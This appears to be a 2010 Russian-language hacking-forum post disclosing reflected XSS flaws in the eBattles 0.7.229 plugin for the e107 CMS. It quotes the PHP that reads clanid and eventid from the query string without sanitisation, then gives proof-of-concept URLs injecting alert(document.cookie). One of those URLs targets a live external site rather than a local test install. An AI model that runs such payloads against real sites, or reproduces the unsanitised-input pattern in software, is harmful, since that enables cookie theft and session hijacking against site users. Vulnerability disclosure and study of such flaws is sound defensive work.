27.08.2010, 01:08
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
eBattles
eBattles Version 0.7.229(другие версии не тестил)
Зависимости нету
Пассивная XSS
\e107_v0.7.16_full\e107_plugins\ebattles\clanmanag e.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/* Clan Name */
[/COLOR][COLOR="#0000BB"]$clan_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'clanid'[/COLOR][COLOR="#007700"]];
if (![/COLOR][COLOR="#0000BB"]$clan_id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./clans.php"[/COLOR][COLOR="#007700"]);
exit();
}
else
{[/COLOR][/COLOR]
Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/clanmanage.php?clanid=1">alert(document.cookie)
\e107_v0.7.16_full\e107_plugins\ebattles\eventinfo .php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'eventid'[/COLOR][COLOR="#007700"]];
if (![/COLOR][COLOR="#0000BB"]$event_id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./events.php"[/COLOR][COLOR="#007700"]);
exit();
}
else
{
[/COLOR][/COLOR]
Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/eventinfo.php?eventid=1">alert(document.cookie)
Off Site:
Код:
http://ebattles.freehostia.com/e107_plugins/ebattles/eventinfo.php?eventid=31">alert(document.cookie)
|
|
|